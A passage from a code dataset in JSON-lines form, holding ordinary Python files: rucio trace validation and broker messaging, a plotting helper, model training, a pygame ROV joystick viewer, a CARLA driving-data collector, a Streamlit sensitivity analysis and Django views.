\"string\"},\n },\n \"required\": ['eventType', 'localSite', 'eventVersion', 'uuid', 'scope',\n 'filename', 'dataset']\n}\n\nPUT_SCHEMA = {\n \"description\": \"get method, mainly sent by pilots\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"put_sm\", \"put_sm_a\"]},\n \"clientState\": {\"type\": \"string\"},\n \"stateReason\": {\"type\": \"string\"},\n \"url\": {\"type\": [\"string\", \"null\"]},\n \"vo\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"eventVersion\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": \"string\"},\n \"dataset\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"name\": {\"type\": \"string\"},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"usrdn\": {\"type\": \"string\"},\n \"pq\": {\"type\": \"string\"},\n \"localSite\": {\"type\": \"string\"}\n },\n \"required\": ['eventType', 'localSite', 'eventVersion', 'uuid',\n 'filename', 'dataset']\n}\n\nSPECIAL_SCHEMA = {\n \"description\": \"A special schema to capture most unsupported eventTypes\",\n \"type\": \"object\",\n \"properties\": {\n \"eventType\": {\"enum\": [\"sfo2eos\"]},\n \"clientState\": {\"type\": \"string\"},\n \"account\": {\"type\": \"string\"},\n \"scope\": {\"type\": \"string\"},\n \"filename\": {\"type\": \"string\"},\n \"datasetScope\": {\"type\": [\"string\", \"null\"]},\n \"dataset\": {\"type\": [\"string\", \"null\"]},\n \"traceTimeentry\": TIME_ENTRY,\n \"traceTimeentryUnix\": {\"type\": \"number\"},\n \"traceIp\": IPv4orIPv6,\n \"traceId\": UUID,\n \"localSite\": {\"type\": \"string\"},\n \"remoteSite\": {\"type\": \"string\"},\n \"usrdn\": {\"type\": \"string\"},\n },\n \"required\": ['eventType', 'clientState', 'account', 'traceTimeentry', 'traceTimeentryUnix', 'traceIp', 'traceId']\n}\n\nSCHEMAS = {\n 'touch': TOUCH_SCHEMA,\n 'upload': UPLOAD_SCHEMA,\n 'download': DOWNLOAD_SCHEMA,\n 'get': GET_SCHEMA,\n 'get_sm': GET_SCHEMA,\n 'sm_get': GET_SCHEMA,\n 'get_sm_a': GET_SCHEMA,\n 'sm_get_a': GET_SCHEMA,\n 'put': PUT_SCHEMA,\n 'put_sm': PUT_SCHEMA,\n 'put_sm_a': PUT_SCHEMA,\n 'sm_put': PUT_SCHEMA,\n 'sm_put_a': PUT_SCHEMA,\n 'sfo2eos': SPECIAL_SCHEMA\n}\n\nFORMAT_CHECKER = Draft7Validator.FORMAT_CHECKER\n\n\n@FORMAT_CHECKER.checks(format=\"ipv4_or_ipv6\")\ndef ip_format_checker(value: str) -> bool:\n \"\"\"\n Validates IPv4 or IPv6 string values. json schemas can use `ipv4_or_ipv6` as a valid `format` argument\n \"\"\"\n try:\n ipaddress.ip_address(value)\n except ValueError:\n LOGGER.debug(f\"{value} is not a valid IPv4 or IPv6 address and raises an errors upon validation.\")\n result = False\n else:\n result = True\n return result\n\n\nlogging.getLogger(\"stomp\").setLevel(logging.CRITICAL)\n\nfor broker in BROKERS_ALIAS:\n try:\n addrinfos = socket.getaddrinfo(broker, 0, socket.AF_INET, 0, socket.IPPROTO_TCP)\n BROKERS_RESOLVED = [ai[4][0] for ai in addrinfos]\n except:\n pass\n\nCONNS = []\n\nfor broker in BROKERS_RESOLVED:\n CONNS.append(stomp.Connection(host_and_ports=[(broker, PORT)], vhost=VHOST, reconnect_attempts_max=3))\n\n\ndef date_handler(obj):\n \"\"\" format dates to ISO format \"\"\"\n return obj.isoformat() if hasattr(obj, 'isoformat') else obj\n\n\n@METRICS.count_it\ndef trace(payload):\n \"\"\"\n Write a trace to the buffer log file and send it to active mq.\n\n :param payload: Python dictionary with trace report.\n \"\"\"\n\n report = json.dumps(payload, default=date_handler)\n ROTATING_LOGGER.debug(report)\n t_conns = CONNS[:]\n\n try:\n validate_schema(report)\n except InvalidObject as error:\n ROTATING_LOGGER.warning(\"Problem validating schema: %s\" % error)\n LOGGER.warning(\"Problem validating schema: %s\" % error)\n\n try:\n for i in range(len(t_conns)):\n try:\n conn = random.sample(t_conns, 1)[0]\n if not conn.is_connected():\n LOGGER.info('reconnect to ' + conn.transport._Transport__host_and_ports[0][0])\n conn.connect(USERNAME, PASSWORD)\n except stomp.exception.NotConnectedException:\n LOGGER.warning('Could not connect to broker %s, try another one' %\n conn.transport._Transport__host_and_ports[0][0])\n t_conns.remove(conn)\n continue\n except stomp.exception.ConnectFailedException:\n LOGGER.warning('Could not connect to broker %s, try another one' %\n conn.transport._Transport__host_and_ports[0][0])\n t_conns.remove(conn)\n continue\n\n if conn.is_connected:\n conn.send(body=report, destination=TOPIC, headers={'persistent': 'true', 'appversion': 'rucio'})\n else:\n LOGGER.error(\"Unable to connect to broker. Could not send trace: %s\" % report)\n except Exception as error:\n LOGGER.error(error)\n\n\ndef validate_schema(obj):\n \"\"\"\n Validate object against json schema\n\n :param obj: The object to validate.\n\n :raises: InvalidObject\n \"\"\"\n obj = json.loads(obj)\n\n try:\n if obj and 'eventType' in obj:\n event_type = SCHEMAS.get(obj['eventType'].lower())\n if not event_type:\n validation_error = ValidationError(message=f\"Trace schema for eventType {obj['eventType']} is not currently supported.\")\n validation_error.cause = \"SCHEMA_NOT_FOUND\"\n raise validation_error\n validate(obj, SCHEMAS.get(obj['eventType'].lower()), format_checker=FORMAT_CHECKER)\n except ValidationError as error:\n if error.cause == \"SCHEMA_NOT_FOUND\":\n LOGGER.error(error)\n else:\n raise InvalidObject(error)\n","repo_name":"rucio/rucio","sub_path":"lib/rucio/core/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":12460,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"96"} +{"seq_id":"3588457221","text":"import numpy as np\nimport matplotlib.pyplot as plot\n\n'''\nUsage:\nimport myplot\ngildong = myplot.MyPlot()\ngildong.set_attribute('o-')\ngildong.show()\n\nimport numpy as np\nimport myplot.py\ngildong = myplot.MyPlot()\ngildong.set_attribute('o-')\ngildong.show(np.arange(1, 5, 0.1))\n\n'''\n\n# 리스트를 그래프로 표시함.\nclass MyPlot:\n attr = 'o-' #선 속성\n x_label = ''\n y_label = ''\n\n def set_attribute(self, a):\n self.attr = a\n\n def set_labels(self, xl, yl):\n self.x_label = xl\n self.y_label = yl\n\n # arange는 ndarray를 반환함 Array of evenly spaced values.\n def show_arange(self, arr=np.arange(1, 10, 0.1)):\n plot.plot(arr, self.attr)\n plot.xlabel(self.x_label)\n plot.ylabel(self.y_label)\n plot.show()\n\n def show_list(self, list):\n plot.plot(list, self.attr)\n plot.xlabel(self.x_label)\n plot.ylabel(self.y_label)\n plot.show()\n\n","repo_name":"JNU-Room/ML","sub_path":"ML_KJY/CNN_JJJY/CNN_JY/pylib/myplot.py","file_name":"myplot.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"22004923559","text":"import pytorch_lightning as pl \nfrom pytorch_lightning import LightningModule, Trainer\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n\ndef train_model(model, clipping, num_epochs, data_loader_train, data_loader_val, data_loader_test):\n\n early_stop_callback = EarlyStopping(\n monitor='valid_accuracy',\n min_delta=0.00,\n patience=10,\n verbose=False,\n mode='max'\n )\n trainer = Trainer( max_epochs=num_epochs, gradient_clip_val= clipping, progress_bar_refresh_rate = 40, gpus=0, callbacks=[early_stop_callback])\n trainer.fit(model, data_loader_train, data_loader_val)\n final_results = trainer.logged_metrics\n final_results[\"test\"] = trainer.test(model, data_loader_test)[0]\n final_results[\"num_epochs\"] = trainer.current_epoch\n final_results[\"num_parameters\"] = model.num_paramaters()\n return final_results","repo_name":"nickbent/multi-timeseries-classification","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"3366395029","text":"\"\"\"main controller.\"\"\"\nimport time,base64\nimport pygame\nimport cv2\nimport numpy as np\nfrom websocket import create_connection\n\n\nsize = [1280, 720]\n\nclass TextPrint:\n def __init__(self):\n self.reset()\n self.font = pygame.font.Font(None, 20)\n\n def print(self, screen, textString):\n textBitmap = self.font.render(textString, True, BLACK)\n screen.blit(textBitmap, [self.x, self.y])\n self.y += self.line_height\n\n def location_print(self, screen, textString,x=size[0]-200,y=0):\n textBitmap = self.font.render(textString, True, BLACK)\n screen.blit(textBitmap, [x, y])\n\n\n def title(self,screen):\n\n self.location_print(screen, \"----Sağa-Sola Dönüş---\", y=0)\n\n self.location_print(screen, \"---Araç İleri-Geri Durumu---\", y=30)\n\n \"\"\"bu alanda biz ekranda göstermek istediğimiz aracın iniş ve yükselişine ait button bilgilerini göstermekteyiz\"\"\"\n\n self.location_print(screen,\n \" ----Derinlik Durum----\",\n y=60)\n\n \"\"\"ekrana Gripper Yazısı Bastırıyoruz\"\"\"\n self.location_print(screen,\n \" ----Gripper Arm Durumu----\",\n y=90)\n\n \"\"\"ekrana ışık bilgisi bastırıyoruz\"\"\"\n self.location_print(screen,\n \" ----Işık Durum Bilgisi----\",\n y=120)\n\n \"\"\"aracın derinliğini anlık olarak öğrenmek amaçlı bir fonksiyon\"\"\"\n def depth_button(self, screen,button_index,button_value):\n\n \"\"\"burada sabit bir fonksiyon oluşturarak araç sabit fonksiyonu oluşturduk sürekli kullanmak için\"\"\"\n def vehicle_constant():\n self.print(screen, \"Araç Sabit Durmakta.\")\n\n\n\n \"\"\"eğer ki aşağı iniş yukarı çıkışlardan birisine basılırsa button değeri 1 olursa ekrana yazı bastır\"\"\"\n if button_index == 4 or button_index==6:\n x=self.x\n if button_value==1:\n\n #self.print(screen, \"Araç Yüzeye Çıkmakta.\" if button_index== 4 else \"Araç Derine Doğru Dalmakta.\")\n\n self.location_print(screen, (\"Araç Yüzeye Çıkmakta.\" if button_value==1 else \"Araç Sabit Durmakta.\")\n if button_index== 4 else\n (\"Araç Derine Doğru Dalmakta.\"if button_value==1 else \"Araç Sabit Durmakta.\"),y=75)\n\n # elif button_value==0:\n # self.location_print(screen, \"\" if button_value == 1 else \"Araç Sabit Durmakta.\", y=15)\n\n\n\n\n \"\"\"gripper ı kontrol etmek için yapılmış bir fonksiyon \"\"\"\n def gripper_arm(self, screen,button_index,button_value):\n\n\n \"\"\"bu alanda biz ekranda göstermek istediğimiz arac kolunun açılış ve kapnışını kontrol ediyoruz ait button bilgilerini göstermekteyiz\"\"\"\n\n if button_index == 5 or button_index==7:\n x=self.x\n if button_value==1:\n\n #self.print(screen, \"Araç Yüzeye Çıkmakta.\" if button_index== 4 else \"Araç Derine Doğru Dalmakta.\")\n\n self.location_print(screen, (\"Kol açılıyor.\" if button_value==1 else \"Araç Kolu Sabit Durmakta.\")\n if button_index== 5 else\n (\"Kol Kapanıyor.\"if button_value==1 else \"Araç Kolu Sabit Durmakta.\"),y=105)\n\n\n\n # if button_index == 5 or button_index==7:\n # if button_value==1:\n # self.print(screen, \"Kol açılıyor.\" if button_index== 7 else \"Kol Kapanıyor.\")\n # else:\n # vehicle_constant()\n\n def reset(self):\n self.x = 1150\n self.y = 10\n self.line_height = 40\n\n def indent(self):\n self.x += 10\n\n def unindent(self):\n self.x -= 10\n\n\ncamera = cv2.VideoCapture(0)\n #cameradan bilgi okuma\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n\n\n# Bu, ekrana yazdırmamıza yardımcı olacak basit bir sınıf\n# Oyun çubuklarıyla hiçbir ilgisi yok, sadece\n# bilgi.\npygame.init()\n\n# Ekranın genişliğini ve yüksekliğini ayarlama [genişlik, yükseklik]\nscreen = pygame.display.set_mode(size)\n\npygame.display.set_caption(\"Joystick ile PC'den Kontrol\")\n\n# Kullanıcı kapat düğmesini tıklayana kadar bekleyin.\ndone = False\n\n# Ekranın ne kadar hızlı güncelleneceğini yönetmek için kullanılır\nclock = pygame.time.Clock()\n\n# joystick kollarını başlat\npygame.joystick.init()\n\n# Kamerayı başlat ve başlat\n# pygame.camera.Camera.start()\n\n\ntextPrint = TextPrint()\n\n# -------- Main Program Loop -----------\n# cam=cv2.VideoCapture(0)\ntry:\n\n while True:\n\n # ETKİNLİK İŞLEME ADIMI\n for event in pygame.event.get(): # Kullanıcı bir şey yaptı\n if event.type == pygame.QUIT: # Kullanıcı kapat'ı tıkladıysa\n done = True # Yaptığımız işaret, bu döngüden çıkalım\n pygame.quit()\n cv2.destroyAllWindows()\n\n # ÇİZİM ADIM\n # İlk olarak, ekranı beyaza temizleyin. Bunun üzerine başka çizim komutları\n # koymayın, aksi takdirde bu komutla silinirler.\n\n screen.fill(WHITE)\n\n # ret, frame = camera.read()\n\n ws = create_connection(\"ws://127.0.0.1:5001\")\n ws.send(\"Hello, World\")\n result = ws.recv()\n ws.close()\n im_bytes = base64.b64decode(result.decode(\"utf-8\"))\n im_arr = np.frombuffer(im_bytes, dtype=np.uint8) # im_arr is one-dim Numpy array\n img = cv2.imdecode(im_arr, flags=cv2.IMREAD_COLOR)\n # cv2.imshow(\"Resim\", img)\n img = img\n frame = img.copy()\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = np.array(frame)\n # yüzdelik değere göre büyültme ve küçültme yap\n width_percent = 100\n height_percent = 80\n width = int(frame.shape[1] * width_percent / 100)\n height = int(frame.shape[1] * height_percent / 100)\n dim = (width, height)\n\n frame = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n frame = np.rot90(frame)\n frame = pygame.surfarray.make_surface(frame)\n screen.blit(frame, (100, 100))\n\n # pygame.display.update()\n\n # Sayımını al joysticks\n joystick_count = pygame.joystick.get_count()\n\n # textPrint.print(screen, \"joysticks kolu sayısı : {}\".format(joystick_count))\n # textPrint.indent()\n # pilotInput = [0 for]\n # For each joystick:\n for i in range(joystick_count):\n\n \"\"\"ekrana title bilgilerini basıtıyoruz\"\"\"\n textPrint.title(screen)\n\n joystick = pygame.joystick.Joystick(i)\n joystick.init()\n\n # textPrint.print(screen, \"Joystick {}\".format(i))\n # textPrint.indent()\n\n # Denetleyici için işletim sisteminden adı alın/joystick\n name = joystick.get_name()\n\n # Genellikle eksen çiftler halinde çalışır, biri için yukarı / aşağı ve diğeri için sola / sağa.\n axes = joystick.get_numaxes()\n\n for i in range(axes):\n axis = joystick.get_axis(i)\n\n if i == 0:\n\n if axis == -1.0:\n # textPrint.print(screen, \"Sola Hareket Etmekte.\")\n textPrint.location_print(screen, \"Sola Hareket Etmekte.\", y=15)\n\n elif axis == 0.999969482421875:\n # textPrint.print(screen, \"Sağa Hareket Etmekte.\")\n textPrint.location_print(screen, \"Sağa Hareket Etmekte.\", y=15)\n else:\n # textPrint.print(screen, \"Sağa - Sola Hareket etmiyor.\")\n textPrint.location_print(screen, \"Sağa - Sola Hareket etmiyor.\", y=15)\n elif i == 1:\n\n if axis == -1.0:\n # textPrint.print(screen, \"Araç İleri Doğru Gitmekte.\")\n textPrint.location_print(screen, \"Araç İleri Doğru Gitmekte.\", y=45)\n\n elif axis == 0.999969482421875:\n # textPrint.print(screen, \"Araç Geri Doğru Gitmekte.\")\n textPrint.location_print(screen, \"Araç Geri Doğru Gitmekte.\", y=45)\n\n else:\n # textPrint.print(screen, \"Araç Sabit Durmakta.\")\n textPrint.location_print(screen, \"Araç Sabit Durmakta.\", y=45)\n\n buttons = joystick.get_numbuttons()\n\n for i in range(buttons):\n button = joystick.get_button(i)\n\n if i == 0:\n textPrint.location_print(screen, \"Araç Önü Aydınlatılıyor.\" if button == 1 else \"\", y=135)\n elif i == 1:\n pass\n elif i == 2:\n pass\n elif i == 3:\n pass\n elif i == 4:\n \"\"\"derinlik yüzeye çıkış\"\"\"\n textPrint.depth_button(screen, i, button)\n\n elif i == 6:\n \"\"\"derinlik aşağı iniş\"\"\"\n textPrint.depth_button(screen, i, button)\n elif i == 5:\n \"\"\"gripper \"\"\"\n # textPrint.gripper_arm(screen,i,button)\n textPrint.location_print(screen, \"Araç Kol Ağzı Açılıyor.\" if button == 1 else \"\", y=105)\n\n elif i == 7:\n \"\"\"grippyer\"\"\"\n # textPrint.gripper_arm(screen, i, button)\n textPrint.location_print(screen, \"Araç Kol Ağzı Kapanıyor.\" if button == 1 else \"\", y=105)\n\n textPrint.reset()\n\n # Şapka anahtarı. Yön için ya hep ya hiç, joystick gibi değil.\n # Değer bir dizide geri gelir.\n hats = joystick.get_numhats()\n\n for i in range(hats):\n hat = joystick.get_hat(i)\n\n # async with websockets.connect(\"ws://127.0.0.1:5553\") as socket:\n\n # await socket.send(str(message_list))#message gönder\n\n # BU YORUMUN ÜZERİNDEN ÇİZMEK İÇİN TÜM KOD\n\n # Devam edin ve ekranı çizdiklerimizle güncelleyin.\n pygame.display.flip()\n\n # Saniyede 20 kare ile sınırlandır\n clock.tick(24)\nexcept KeyboardInterrupt as SystemExit:\n pygame.quit()\n cv2.destroyAllWindows()\n# Pencereyi kapatın ve çıkın.\n# Bu satırı unutursanız, program 'askıda kalacaktır'\n# IDLE'den çalışıyorsa çıkışta.\npygame.quit()\n\n\n\n","repo_name":"harunkurtme/UnderWater-Rov-KOU-GALLIPOLI","sub_path":"Rover/Controller-PC/motors_controller.py","file_name":"motors_controller.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"35976818491","text":"#Dependencies\r\nimport glob\r\nimport os\r\nimport sys\r\nimport time\r\nimport numpy as np\r\nimport carla\r\nfrom IPython.display import display, clear_output\r\nimport logging\r\nimport random\r\nfrom datetime import datetime\r\nimport cv2\r\n\r\nimport argparse\r\nimport keyboard\r\nimport threading\r\n\r\nimport argparse\r\n\r\n\r\n\r\n\r\n\r\n#autopilot parser\r\ndef parse_arguments():\r\n parser = argparse.ArgumentParser(description='Autopilot Flag Parser')\r\n parser.add_argument('--autopilot', action='store_true', help='Enable autopilot')\r\n parser.add_argument('--folder', type=str, help='Path to the file')\r\n parser.add_argument('--frames', type=int, help='nbr of frames to save')\r\n return parser.parse_args()\r\n\r\n# Function to control the vehicle with keyboard inputs\r\ndef control_vehicle(vehicle):\r\n # Constants for controlling the vehicle\r\n STEER_INCREMENT = 0.05\r\n THROTTLE_INCREMENT = 0.05\r\n BRAKE_INCREMENT = 0.05\r\n\r\n # Initialize control values\r\n steer = 0.0\r\n throttle = 0.0\r\n brake = 0.0\r\n \r\n # Keyboard input handlers\r\n def on_key_release(key):\r\n nonlocal steer, throttle, brake\r\n\r\n if key.name == \"left\":\r\n steer=0\r\n elif key.name == \"right\":\r\n steer=0\r\n if key.name == \"up\":\r\n throttle =0\r\n if key.name == \"down\":\r\n brake=0\r\n\r\n # Update vehicle controls\r\n control = carla.VehicleControl()\r\n control.steer = steer\r\n control.throttle = throttle\r\n control.brake = brake\r\n vehicle.apply_control(control)\r\n\r\n def on_key_press(key):\r\n nonlocal steer, throttle, brake\r\n\r\n if key.name == \"left\":\r\n steer -= STEER_INCREMENT\r\n elif key.name == \"right\":\r\n steer += STEER_INCREMENT\r\n if key.name == \"up\":\r\n throttle += THROTTLE_INCREMENT\r\n if key.name == \"down\":\r\n brake += BRAKE_INCREMENT\r\n throttle -=THROTTLE_INCREMENT\r\n\r\n\r\n # Update vehicle controls\r\n control = carla.VehicleControl()\r\n control.steer = steer\r\n control.throttle = throttle\r\n control.brake = brake\r\n vehicle.apply_control(control)\r\n\r\n # Register keyboard event handlers\r\n keyboard.on_release_key(\"left\", on_key_release)\r\n keyboard.on_release_key(\"right\", on_key_release)\r\n keyboard.on_release_key(\"up\", on_key_release)\r\n keyboard.on_release_key(\"down\", on_key_release)\r\n keyboard.on_press_key(\"left\", on_key_press)\r\n keyboard.on_press_key(\"right\", on_key_press)\r\n keyboard.on_press_key(\"up\", on_key_press)\r\n keyboard.on_press_key(\"down\", on_key_press)\r\n\r\n\r\n\r\n\r\n# Function to update the spectator view\r\ndef update_spectator_view():\r\n while True:\r\n # Get the location and rotation of the vehicle\r\n vehicle_location = vehicle.get_location()\r\n vehicle_rotation = vehicle.get_transform().rotation\r\n\r\n # Calculate the spectator view transform\r\n spectator_location = carla.Location(vehicle_location.x, vehicle_location.y, vehicle_location.z + 2.0) # Adjust the height offset if needed\r\n spectator_rotation = carla.Rotation(vehicle_rotation.pitch - 15.0, vehicle_rotation.yaw, vehicle_rotation.roll) # Adjust the pitch offset if needed\r\n spectator_transform = carla.Transform(spectator_location, spectator_rotation)\r\n\r\n # Set the spectator view transform\r\n spectator.set_transform(spectator_transform)\r\n\r\n time.sleep(0.005)\r\n\r\n\r\n\r\n\r\n# Autopilot flag parsing\r\nargs = parse_arguments()\r\n\r\n\r\n\r\n\r\nvehicle = None\r\ncam = None\r\n\r\n#enable logging\r\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\r\n\r\n# Creating a client\r\nclient = carla.Client('localhost', 2000)\r\nclient.set_timeout(15.0)\r\nclient.load_world('Town10HD')\r\nworld = client.get_world()\r\n\r\n\r\n#Create Folder to store data\r\ntoday = datetime.now()\r\nif today.hour < 10:\r\n h = \"0\"+ str(today.hour)\r\nelse:\r\n h = str(today.hour)\r\nif today.minute < 10:\r\n m = \"0\"+str(today.minute)\r\nelse:\r\n m = str(today.minute)\r\n\r\n\r\nif args.folder :\r\n file_path=args.folder\r\n\r\nelse :\r\n print(\"please add the --folder YOUR/Folder/ argument to your prompt command\")\r\n \r\ndirectory = file_path +\"\\\\TestData\"+ today.strftime('%Y%m%d_')+ h + m + \"_npy\"\r\n\r\nprint(directory)\r\n\r\ntry:\r\n os.makedirs(directory)\r\nexcept:\r\n print(\"Directory already exists\")\r\ntry:\r\n inputs_file = open(directory + \"/inputs.npy\",\"ba+\") \r\n outputs_file = open(directory + \"/outputs.npy\",\"ba+\") \r\nexcept:\r\n print(\"Files could not be opened\")\r\n \r\n#Spawn vehicle\r\n#Get the blueprint concerning a tesla model 3 car\r\nbp = world.get_blueprint_library().find('vehicle.tesla.model3')\r\n#we attribute the role name amrn to our blueprint\r\nbp.set_attribute('role_name','amrn')\r\n#get a random color\r\ncolor = random.choice(bp.get_attribute('color').recommended_values)\r\n#put the selected color on our blueprint\r\nbp.set_attribute('color',color)\r\n\r\n#get all spawn points\r\nspawn_points = world.get_map().get_spawn_points()\r\nnumber_of_spawn_points = len(spawn_points)\r\n\r\n#select a random spawn point\r\nif 0 < number_of_spawn_points:\r\n random.shuffle(spawn_points)\r\n transform = spawn_points[0]\r\n #spawn our vehicle !\r\n vehicle = world.spawn_actor(bp,transform)\r\n print('\\nVehicle spawned')\r\nelse: \r\n #no spawn points \r\n logging.warning('Could not found any spawn points')\r\n \r\n#Adding a RGB camera sensor\r\nWIDTH = 200\r\nHEIGHT = 88\r\ncam_bp = None\r\n#Get blueprint of a camera\r\ncam_bp = world.get_blueprint_library().find('sensor.camera.rgb')\r\n#Set attributes \r\ncam_bp.set_attribute(\"image_size_x\",str(WIDTH))\r\ncam_bp.set_attribute(\"image_size_y\",str(HEIGHT))\r\ncam_bp.set_attribute(\"fov\",str(105))\r\n#Location to attach the camera on the car\r\ncam_location = carla.Location(2,0,1)\r\ncam_rotation = carla.Rotation(0,0,0)\r\ncam_transform = carla.Transform(cam_location,cam_rotation)\r\n#Spawn the camera and attach it to our vehicle \r\ncam = world.spawn_actor(cam_bp,cam_transform,attach_to=vehicle, attachment_type=carla.AttachmentType.Rigid)\r\n\r\n#Gets the spectator view to where the vehicle is spawned\r\nspectator = world.get_spectator()\r\nspawn_points[0].location.z = spawn_points[0].location.z+1 #start_point was used to spawn the car but we move 1m up to avoid being on the floor\r\nspectator.set_transform(spawn_points[0])\r\n\r\n#Function to convert image to a numpy array\r\ndef process_image(image):\r\n #Get raw image in 8bit format\r\n raw_image = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\r\n #Reshape image to RGBA\r\n raw_image = np.reshape(raw_image, (image.height, image.width, 4))\r\n\r\n\r\n #Taking only RGB\r\n processed_image = raw_image[:, :, :3]/255\r\n\r\n\r\n return processed_image\r\n\r\n#Save required data\r\ndef save_image(carla_image):\r\n image = process_image(carla_image)\r\n\r\n control = vehicle.get_control()\r\n data = [control.steer, control.throttle, control.brake]\r\n np.save(inputs_file, image)\r\n np.save(outputs_file, data)\r\n \r\n\r\n# Enable autopilot or keyboard control based on the flag\r\nif args.autopilot:\r\n vehicle.set_autopilot(True)\r\nelse:\r\n control_vehicle(vehicle)\r\n\r\n\r\n#Attach event listeners\r\ncam.listen(save_image)\r\n\r\n\r\n\r\n\r\n# Start the spectator view update loop\r\nupdate_spectator_view_thread = threading.Thread(target=update_spectator_view)\r\nupdate_spectator_view_thread.start()\r\n\r\n\r\n# Main loop\r\ntry:\r\n i = 0\r\n #How much frames do we want to save\r\n while i < args.frames:\r\n world_snapshot = world.wait_for_tick()\r\n clear_output(wait=True)\r\n display(f\"{str(i)} frames saved\")\r\n i += 1\r\n\r\n\r\nexcept:\r\n print('\\nSimulation error.')\r\n\r\n#Destroy everything \r\nif vehicle is not None:\r\n if cam is not None:\r\n cam.stop()\r\n cam.destroy()\r\n vehicle.destroy()\r\n\r\n#Close everything \r\ninputs_file.close()\r\noutputs_file.close()\r\nprint(\"Data retrieval finished\")\r\nprint(directory)\r\n\r\n\r\n\r\n\r\n","repo_name":"KadAMRN/carla-imitation-learning","sub_path":"data_collection_no_map_data.py","file_name":"data_collection_no_map_data.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32727653614","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport plotly.graph_objects as go\r\nimport plotly.express as px\r\n\r\nif st.session_state.lm:\r\n model = st.session_state.lm\r\n df = st.session_state.df\r\n X,y = st.session_state.lm_params\r\n coeffs = model.coef_ \r\n coeff_df = pd.DataFrame(\r\n data=coeffs,\r\n columns=[\"coefficients\"],\r\n index=df.columns\r\n )\r\n baseline_predictions = model.predict(X)\r\n sensitivity_df = pd.DataFrame(columns=['Feature', 'Baseline', 'Perturbed', 'Difference'])\r\n sensitivity_l = []\r\n for feature in X.columns:\r\n perturbed_X = X.copy()\r\n perturbed_X[feature] = np.random.normal(perturbed_X[feature].mean()*2,\r\n perturbed_X[feature].std()*2, \r\n len(perturbed_X))\r\n\r\n perturbed_predictions = model.predict(perturbed_X)\r\n difference = perturbed_predictions - baseline_predictions\r\n sensitivity_l.append({\r\n 'Feature': feature,\r\n 'Baseline': np.mean(baseline_predictions),\r\n 'Perturbed': np.mean(perturbed_predictions),\r\n 'Difference': np.mean(difference)\r\n })\r\n \r\n sensitivity_df = pd.concat([sensitivity_df, pd.DataFrame(sensitivity_l)], ignore_index=True)\r\n st.dataframe(sensitivity_df)\r\n st.text('The magnitude of each bar below indicates the imapact that specific feature')\r\n st.text('will have on the house price. ie a larger bar indicates a large impact price')\r\n fig = go.Figure()\r\n\r\n fig.add_trace(go.Bar(\r\n name='Positive',\r\n x=sensitivity_df['Difference'],\r\n y=sensitivity_df['Feature'],\r\n orientation='h',\r\n marker_color='azure'\r\n ))\r\n\r\n fig.update_layout(\r\n title='Sensitivity Analysis',\r\n xaxis_title='Change in Predicted Output',\r\n yaxis_title='Feature',\r\n barmode='relative',\r\n bargap=0.2,\r\n bargroupgap=0.1,\r\n showlegend=False,\r\n )\r\n\r\n st.plotly_chart(fig)\r\n df_corr = X.copy()\r\n df_corr[\"SalePrice\"] = y\r\n _ = df_corr.columns.tolist()\r\n cols = _[-1:] + _[:-1]\r\n df_corr=df_corr[cols]\r\n st.plotly_chart(px.imshow(df_corr.corr(),\r\n width = 700,\r\n height = 700,\r\n color_continuous_scale='Viridis'\r\n )\r\n )\r\n \r\n","repo_name":"stefziv/436-Project","sub_path":"pages/2_Model_&_Sensitivity_Analysis.py","file_name":"2_Model_&_Sensitivity_Analysis.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"28093867583","text":"from django.conf.urls import url\nimport re\nfrom . import views \nurlpatterns = [\n url(r'^$', views.index),\n url(r'^process$', views.process),\n url(r'^success$', views.success),\n url(r'^login$', views.login),\n url(r'^reset$', views.reset),\n url(r'^addtravel$', views.addtravel),\n url(r'^processtrip$', views.processtrip),\n url(r'^success/destination/(?P<id>[0-9]+)$', views.almostdone),\n url(r'^success/join', views.join),\n\n\n \n\n] ","repo_name":"AlinaSadykova/belt_exam","sub_path":"apps/exam_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11768766094","text":"from django.shortcuts import render\nfrom .models import description\n\n\n\ndef page(request):\n\n des1=description()\n des1.id=1\n des1.name=\"Ab\"\n des1.image='c++.jpg'\n\n des2=description()\n des2.id=2\n des2.name=\"wp\"\n des2.image='c.png'\n des3=description()\n\n des3.id=3\n des3.name=\"pv\"\n des3.image='css.png'\n dest=[des1,des2,des3]\n\n return render(request,'home.html',{'dest':dest})\n ","repo_name":"vidhyaen/django","sub_path":"dynamic/page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73280386557","text":"import subprocess\nimport optparse\nimport sys\nimport os\n\n# Start by checking what the 